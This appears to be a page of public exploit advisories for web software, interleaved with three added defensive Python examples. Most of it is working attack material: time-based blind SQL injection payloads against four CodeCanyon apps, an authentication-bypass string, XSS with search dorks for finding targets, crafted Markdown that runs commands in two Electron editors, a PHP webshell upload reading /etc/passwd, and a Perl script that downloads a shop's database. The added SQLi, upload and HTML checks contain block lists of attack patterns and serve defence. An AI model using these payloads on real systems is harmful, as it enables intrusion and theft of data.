<pre><code># Exploit Title: Quicklancer v1.0 - SQL Injection<br /># Date: 2023-05-17<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor:<br />https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135<br /># Demo Site: https://quicklancer.bylancer.com<br /># Tested on: Kali Linux<br /># CVE: N/A<br /><br /><br />### Request ###<br /><br />POST /php/user-ajax.php HTTP/1.1<br />Content-Type: application/x-www-form-urlencoded<br />Accept: */*<br />x-requested-with: XMLHttpRequest<br />Referer: https://localhost<br />Cookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2;<br />quickjob_view_counted=31; Quick_lang=arabic<br />Content-Length: 93<br />Accept-Encoding: gzip,deflate,br<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36<br />Host: localhost<br />Connection: Keep-alive<br /><br />action=searchStateCountry&dataString=deneme<br /><br /><br />### Parameter & Payloads ###<br /><br />Parameter: dataString (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068<br />FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo<br /><br /></code></pre>
<pre><code># Exploit Title: Smart School v1.0 - SQL Injection<br /># Date: 2023-05-17<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor: https://codecanyon.net/item/smart-school-school-management-system/19426018<br /># Demo Site: https://demo.smart-school.in<br /># Tested on: Kali Linux<br /># CVE: N/A<br /><br /><br />### Request ###<br /><br />POST /course/filterRecords/ HTTP/1.1<br />Host: localhost<br />Cookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvve<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101<br />Firefox/102.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 136<br />Origin: https://localhost<br />Referer: https://localhost/course/<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br />searchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1<br /><br /><br />### Parameter & Payloads ###<br /><br />Parameter: searchdata[0][searchfield] (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload:<br />searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_id<br />AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)--<br />hAHp&searchdata[0][searchvalue]=1<br /><br /></code></pre>
<pre><code># Exploit Title: LeadPro CRM v1.0 - SQL Injection<br /># Date: 2023-05-17<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor: https://codecanyon.net/item/leadifly-lead-call-center-crm/43485578<br /># Demo Site: https://demo.leadifly.in<br /># Tested on: Kali Linux<br /># CVE: N/A<br /><br /><br />### Request ###<br /><br />GET /api/v1/products?fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name%20lk%20%22%25aa%25%22&order=id%20desc&offset=0&limit=10<br />HTTP/1.1<br />Host: localhost<br />Cookie:<br />XSRF-TOKEN=eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0%3D;<br />leadifly_session=eyJpdiI6InYyUzVNWkVhVHVrODI2ZTl0a21SNmc9PSIsInZhbHVlIjoiSzNjeDVxYUJRbHZEOVd3Z2I3N2pWa1VrbHdTUUNNSmF6blFEN2E4Q3l5RjJ5WnUxbTdyaFJJN3dCUWhZRklzd3B2OWN5bkZJTnR0RndndGxyNjdRSUp6b2NBV1JhSHFWb211SllzajFkb3JCQmtqSzJEeU9ENDZDWW1jdnF0VHEiLCJtYWMiOiI1YjI1YTdlNjhkMDg4NTQyOGI0ODI0ODI5ZjliNzE0OWExNGUxMWVjYmY2MjM2Y2YyMmNkNjMzYmMzODYwNzE1IiwidGFnIjoiIn0%3D<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101<br />Firefox/102.0<br />Accept: application/json<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />X-Csrf-Token: kMwvghrsJyPwJ1LGTXnMgMQAtQGA33DzzMYdes6V<br />Authorization: Bearer<br />eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8ubGVhZGlmbHkuaW4vYXBpL3YxL2F1dGgvbG9naW4iLCJpYXQiOjE2ODQzMTk3ODAsImV4cCI6MTY4NDM0MTY4MCwibmJmIjoxNjg0MzE5NzgwLCJqdGkiOiJleGJDV2ZmdWhiWTIzRlNqIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.0GcDjE6Q3GYg8PUeJQAXtMET6yAjGh1Bj9joRMoqZo8<br />X-Xsrf-Token:<br 
/>eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0=<br />Referer: https://localhost/admin/product<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br />Te: trailers<br />Connection: close<br /><br /><br />### Parameter & Payloads ###<br /><br />Parameter: filters (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload:<br />fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name<br />lk "%aa%") AND (SELECT 6593 FROM (SELECT(SLEEP(5)))qBNH) AND<br />(8549=8549&order=id desc&offset=0&limit=10<br /><br /></code></pre>
<pre><code># Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution<br /># Date: 2023-04-27<br /># Exploit Author: 8bitsec<br /># CVE: CVE-2023-31874<br /># Vendor Homepage: yank-note.com<br /># Software Link: https://github.com/purocean/yn<br /># Version: 3.52.1<br /># Tested on: [Ubuntu 22.04 | Mac OS 13]<br /><br />Release Date: 2023-04-27<br /><br />Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement<br /><br />Technical Details & Description:<br /><br />A vulnerability was discovered in Yank Note v3.52.1, allowing a user to execute arbitrary code by opening a specially crafted file.<br /><br />Proof of Concept (PoC):<br />Arbitrary code execution:<br /><br />Create a markdown file (.md) in any text editor and write the following payload.<br />Mac:<br /><iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>"><br /><br />Ubuntu:<br /><iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>"><br /><br />Opening the file in Yank Note will automatically launch the Calculator application.<br /><br /><br /></code></pre>
<pre><code>===========================================================================================<br />| # Title : Esg 2.5 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://www.creatop.com.tw/esg | <br />| # Dork : Powered by CREATOP |<br />===========================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use payload : /en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script><br /><br />[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?page=1&tayear=2023'"()%26%25<script>alert(/indoushka/);</script><br /><br /><br />Greetings to :===================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|<br />=================================================================================================<br /></code></pre>
<pre><code>========================================================================================<br />| # Title : Apple Zeed ALL YOUR STYLE CMS 1.00 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0(64-bit) | <br />| # Vendor : https://www.applezeed.com/web-creative-package-all-your-style.php | <br />| # Dork : Power BY applezeed.com | <br />========================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use payload : User & Pass : ADMIN' OR 1=1#<br /><br />[+] https://127.0.0.1/https/biggestjoy.com/backend/admin.php?mod=sitemap<br /><br /><br />Greetings to :=============================================================================<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*| <br />===========================================================================================<br /></code></pre>
<pre><code># Exploit Title: Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution<br /># Date: 2023-04-24<br /># Exploit Author: 8bitsec<br /># CVE: CVE-2023-31873<br /># Vendor Homepage: https://github.com/mariuskueng/gin<br /># Software Link: https://github.com/mariuskueng/gin<br /># Version: 0.7.4<br /># Tested on: [Mac OS 13]<br /><br />Release Date: 2023-04-24<br /><br />Product & Service Introduction: Javascript Markdown editor for Mac<br /><br />Technical Details & Description:<br />A vulnerability was discovered in Gin Markdown Editor v0.7.4, allowing a user to execute arbitrary code by opening a specially crafted file.<br /><br />Proof of Concept (PoC):<br />Arbitrary code execution:<br /><br />Create a markdown file (.md) in any text editor and write the following payload:<br /><video><source onerror"alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());"><br /><br />Opening the file in Gin will automatically launch the Calculator application.<br /><br /></code></pre>
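Added example for the two Electron Markdown editor reports on this page (Yank Note above and Gin here). It is not code from either project or from the advisory author; it shows the pre-render check an editor, or anyone who receives .md files, can run: parse the raw HTML a Markdown file carries and refuse to render when it contains blocked elements, on* event handler attributes, srcdoc, or javascript:/data: URLs. The blocked-element list, the attribute lists and the sample document are constructed for the example. Beyond this gate, an Electron editor should render notes with nodeIntegration disabled and contextIsolation enabled so that script in a note has no path to Node APIs such as child_process in the first place.

```python
"""Pre-open check for Markdown that carries active HTML (added example)."""
import re
from html.parser import HTMLParser

# Elements that have no business in a note rendered by an editor with Node
# access; constructed block list for this example.
BLOCKED_TAGS = {"script", "iframe", "object", "embed", "base", "meta",
                "link", "form", "frame", "frameset"}
# Attributes whose value is interpreted as a URL or document.
URL_ATTRS = {"src", "href", "action", "formaction", "data", "xlink:href"}
DANGEROUS_SCHEMES = ("javascript:", "data:", "vbscript:")
FENCE = chr(96) * 3   # Markdown code fence marker


class _ActiveHtmlFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []   # (line, tag, reason)

    def handle_starttag(self, tag, attrs):
        line = self.getpos()[0]
        tag = tag.lower()
        if tag in BLOCKED_TAGS:
            self.findings.append((line, tag, "blocked element"))
        for name, value in attrs:
            name = name.lower()
            value = (value or "").strip().lower()
            if name.startswith("on"):
                self.findings.append((line, tag, f"event handler attribute {name}"))
            elif name == "srcdoc":
                self.findings.append((line, tag, "srcdoc attribute"))
            elif name in URL_ATTRS and value.startswith(DANGEROUS_SCHEMES):
                scheme = value.split(":", 1)[0]
                self.findings.append((line, tag, f"{name} uses {scheme}: scheme"))


def _blank_fences(text):
    """Replace fenced code blocks with the same number of newlines, so HTML
    shown as a code sample is not reported and line numbers stay correct."""
    pattern = re.compile(re.escape(FENCE) + r".*?" + re.escape(FENCE), re.S)
    return pattern.sub(lambda m: "\n" * m.group(0).count("\n"), text)


def find_active_html(markdown_text):
    """Return [(line, tag, reason), ...] for every active HTML construct
    found outside fenced code blocks; an empty list means nothing was found."""
    parser = _ActiveHtmlFinder()
    parser.feed(_blank_fences(markdown_text))
    parser.close()
    return parser.findings


def safe_to_open(markdown_text):
    """True when the document carries no active HTML by the rules above."""
    return not find_active_html(markdown_text)


if __name__ == "__main__":
    # Constructed sample note: a plain image, an iframe with srcdoc, a media
    # element with an event handler, and a fenced code sample that is ignored.
    SAMPLE = (
        "# Notes\n\n<img src=\"cat.png\" alt=\"ok\">\n\n"
        "<iframe srcdoc=\"<b>hi</b>\"></iframe>\n\n"
        "<video><source onerror=\"alert(1)\"></video>\n\n"
        + FENCE + "html\n<script>x</script>\n" + FENCE + "\n"
    )
    for line, tag, reason in find_active_html(SAMPLE):
        print(f"line {line}: <{tag}> {reason}")
    print("safe to open:", safe_to_open(SAMPLE))
```

The check skips fenced code blocks only; inline code spans are still parsed, and URL values with control characters inside the scheme are not normalised, so treat it as a gate that errs toward refusing a file, not as a sanitiser that makes a file safe to render.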
<pre><code># Exploit Title: Stackposts Social Marketing Tool v1.0 - SQL Injection<br /># Date: 2023-05-17<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor:<br />https://codecanyon.net/item/stackposts-social-marketing-tool/21747459<br /># Demo Site: https://demo.stackposts.com<br /># Tested on: Kali Linux<br /># CVE: N/A<br /><br /><br />### Request ###<br /><br />POST /spmo/auth/login HTTP/1.1<br />X-Requested-With: XMLHttpRequest<br />Referer: https://localhost/spmo/<br />Content-Type: application/x-www-form-urlencoded<br />Accept: application/json, text/javascript, */*; q=0.01<br />Content-Length: 104<br />Accept-Encoding: gzip,deflate,br<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36<br />(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36<br />Host: localhost<br />Connection: Keep-alive<br /><br />csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1*<br /><br /><br />### Parameter & Payloads ###<br /><br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1')<br />AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg<br /><br /><br /></code></pre>
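Added defender-side example serving the four time-based blind SQL injection reports on this page (Quicklancer, Smart School, LeadPro CRM, Stackposts) and the ADMIN' OR 1=1# login bypass in the Apple Zeed report; it is not code from any of those products or advisory authors. It has two parts: flag_params() decodes a query string or form body and flags parameters that carry a time-delay call, a quote-break followed by a boolean, or a trailing comment (usable as a WAF rule or over access logs), and vulnerable_login() / safe_login() put the string-built query that makes the bypass work beside its parameterised replacement. The signature list, the users table and its one account are constructed; SQLite stands in for MySQL, so the bypass demo uses the '--' comment token that SQLite understands instead of '#'.

```python
"""Companion checks for the SQL injection reports above (added example)."""
import re
import sqlite3
from urllib.parse import parse_qsl

# Ordered (label, pattern) pairs; the first match wins per parameter.
# Constructed for this example from the payload shapes in the reports:
# a detection aid for a WAF rule or log review, not a complete SQL grammar.
SQLI_SIGNATURES = [
    ("time-delay function", re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(", re.I)),
    ("time-delay statement", re.compile(r"\bwaitfor\s+delay\b", re.I)),
    ("quote/paren break + boolean", re.compile(r"['\")]\s*(and|or)\b", re.I)),
    ("trailing SQL comment", re.compile(r"--[\s\w]*$")),
]


def flag_params(raw):
    """Decode a query string or x-www-form-urlencoded body and return
    [(parameter, label), ...] for every parameter that trips a signature."""
    findings = []
    for name, value in parse_qsl(raw, keep_blank_values=True, errors="replace"):
        for label, pattern in SQLI_SIGNATURES:
            if pattern.search(value):
                findings.append((name, label))
                break
    return findings


def make_demo_db():
    """In-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn


def vulnerable_login(conn, username, password):
    """String-built query, the shape behind the ADMIN' OR 1=1# report above.
    SQLite reads '--' rather than '#' as a line comment, so the demo uses that."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone()


def safe_login(conn, username, password):
    """Parameterised query: the input is bound as a value, never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


if __name__ == "__main__":
    # Request bodies taken from the reports above, plus one benign request.
    samples = [
        "action=searchStateCountry&dataString=deneme",
        "action=searchStateCountry&dataString=deneme' AND (SELECT 8068 FROM "
        "(SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo",
        "csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1') AND "
        "(SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg",
        "username=ADMIN' OR 1=1#&password=x",
    ]
    for body in samples:
        print(flag_params(body) or "clean", "<-", body[:60])
    db = make_demo_db()
    print("string-built :", vulnerable_login(db, "' OR 1=1 --", "x"))
    print("parameterised:", safe_login(db, "' OR 1=1 --", "x"))
```

The signature check is a tripwire for the payload shapes shown above and will miss encoded or split variants; the fix that actually closes these reports is the parameterised query in safe_login(), applied to every query that takes request input, including the search and filter endpoints, not only login.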
<pre><code>#Exploit Title: SitemagicCMS 4.4.3 Remote Code Execution (RCE)<br />#Application: SitemagicCMS<br />#Version: 4.4.3<br />#Bugs: RCE<br />#Technology: PHP<br />#Vendor URL: https://sitemagic.org/Download.html<br />#Software Link: https://github.com/Jemt/SitemagicCMS<br />#Date found: 14-05-2023<br />#Author: Mirabbas Ağalarov<br />#Tested on: Linux <br /><br />2. Technical Details & POC<br />========================================<br />steps: <br />1. Go to Content, then Files.<br />2. Upload a file named shell.phar whose content is <?php echo system("cat /etc/passwd"); ?><br />3. Browse to http://localhost/SitemagicCMS/files/images/shell.phar<br /><br /><br /><br />payload: <?php echo system("cat /etc/passwd"); ?><br /><br /><br /><br />PoC request:<br /><br />POST /SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages HTTP/1.1<br />Host: localhost<br />Content-Length: 492<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not:A-Brand";v="99", "Chromium";v="112"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywPUsZSbtgJ6nAn8W<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: iframe<br />Referer: http://localhost/SitemagicCMS/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: SMSESSION13bc620d275e3705=biljb454ko3ddonj5943p364lf<br />Connection: close<br /><br />------WebKitFormBoundarywPUsZSbtgJ6nAn8W<br />Content-Disposition: form-data; name="SMInputSMFilesUpload"; filename="shell.phar"<br />Content-Type: application/octet-stream<br /><br /><?php echo system('cat /etc/passwd'); ?><br /><br />------WebKitFormBoundarywPUsZSbtgJ6nAn8W<br />Content-Disposition: form-data; name="SMPostBackControl"<br /><br /><br />------WebKitFormBoundarywPUsZSbtgJ6nAn8W<br />Content-Disposition: form-data; name="SMRequestToken"<br /><br />60a7a113cf94842a197912273825b421<br />------WebKitFormBoundarywPUsZSbtgJ6nAn8W--<br /><br /></code></pre>
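Added example for the upload step in the report above, written as the gate the file manager should have applied; it is not SitemagicCMS code. validate_upload() rejects names with more than one extension (and dotfiles such as .htaccess), extensions outside an image allow-list, content whose leading bytes do not match the claimed type, and images that carry PHP or script markers; stored_name() shows why the client's filename should never reach the disk; scan_upload_dir() runs the same check over an existing files/images tree to find what already got through. The signature table, the marker list and the sample files built by demo_scan() are constructed for this example.

```python
"""Upload gate and after-the-fact sweep for an image directory (added example)."""
import os
import secrets
import tempfile

# Allowed extension -> leading bytes the file must start with (constructed table).
IMAGE_SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Byte markers that have no place inside an image, whatever its header says.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script", b"<%")


def validate_upload(filename, content):
    """Return (accepted, reason). Reject by name first, then by content."""
    name = os.path.basename(filename.replace("\\", "/"))
    parts = name.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "name must be <basename>.<ext> with exactly one dot"
    ext = parts[1]
    if ext not in IMAGE_SIGNATURES:
        return False, f"extension '{ext}' not allowed"
    if not content.startswith(IMAGE_SIGNATURES[ext]):
        return False, f"content does not match {ext} signature"
    if any(marker in content for marker in SCRIPT_MARKERS):
        return False, "embedded script marker"
    return True, ""


def stored_name(ext):
    """Server-chosen name: the client's filename never reaches the disk."""
    return f"{secrets.token_hex(8)}.{ext}"


def scan_upload_dir(root):
    """List files under root that fail validate_upload(): unexpected
    extensions or image files carrying script markers."""
    flagged = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                ok, _ = validate_upload(fname, fh.read())
            if not ok:
                flagged.append(os.path.relpath(path, root))
    return sorted(flagged)


def demo_scan():
    """Build a throwaway directory holding one valid PNG and one constructed
    .phar file, sweep it, and return the flagged relative paths."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "ok.png"), "wb") as fh:
            fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
        with open(os.path.join(root, "shell.phar"), "wb") as fh:
            fh.write(b"<?php echo 'constructed sample'; ?>")   # harmless stand-in
        return scan_upload_dir(root)


if __name__ == "__main__":
    print(validate_upload("shell.phar", b"<?php echo 'constructed'; ?>"))
    print(validate_upload("cat.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8))
    print("stored as:", stored_name("png"))
    print("flagged by sweep:", demo_scan())
```

The name and content checks belong together: the extension allow-list stops shell.phar outright, and the signature plus marker check stops the same payload hidden behind an image header. Independently of the gate, the directory that receives uploads should be served with script execution disabled by the web server, so that even a file that slips through is returned as bytes rather than run.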
<pre><code>====================================================================================================================================<br />| # Title : A cart 1.0 Database Disclosure Exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | <br />| # Vendor : http://ToastForums.com | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[-] Download the database: <br /><br /> The following Perl exploit will attempt to download the (acart.mdb) file.<br /> The (acart.mdb) file is the database and contains all the data.<br /> <br />[+] Dorking in Google or another search engine.<br /><br />[+] Save the code as a Perl file : poc.pl<br /><br />[+] code :<br /><br />#!/usr/bin/perl -w<br />#<br /># A cart 1.0 Database Disclosure Exploit <br />#<br /># Author : indoushka<br />#<br /># Vendor : ToastForums.com<br /> <br /> <br /> <br />use LWP::Simple;<br />use LWP::UserAgent;<br /><br />system('cls');<br />print ('A cart 1.0 Database Disclosure Exploit');<br />system('color a');<br /><br /><br />if(@ARGV < 2)<br />{<br />print "[-]How To Use\n\n";<br />&help; exit();<br />}<br />sub help()<br />{<br />print "[+] usage1 : perl $0 site.com /path/ \n";<br />print "[+] usage2 : perl $0 localhost / \n";<br />}<br />($TargetIP, $path, $File,) = @ARGV;<br /><br />$File="acart.mdb";<br />my $url = "http://" . $TargetIP . $path . $File;<br />print "\n Fuck you wait!!! \n\n";<br /><br />my $useragent = LWP::UserAgent->new();<br />my $request = $useragent->get($url,":content_file" => "D:/acart.mdb");<br /><br />if ($request->is_success)<br />{<br />print "[+] $url Exploited!\n\n";<br />print "[+] Database saved to D:/acart.mdb\n";<br />exit();<br />}<br />else<br />{<br />print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";<br />exit();<br />}<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>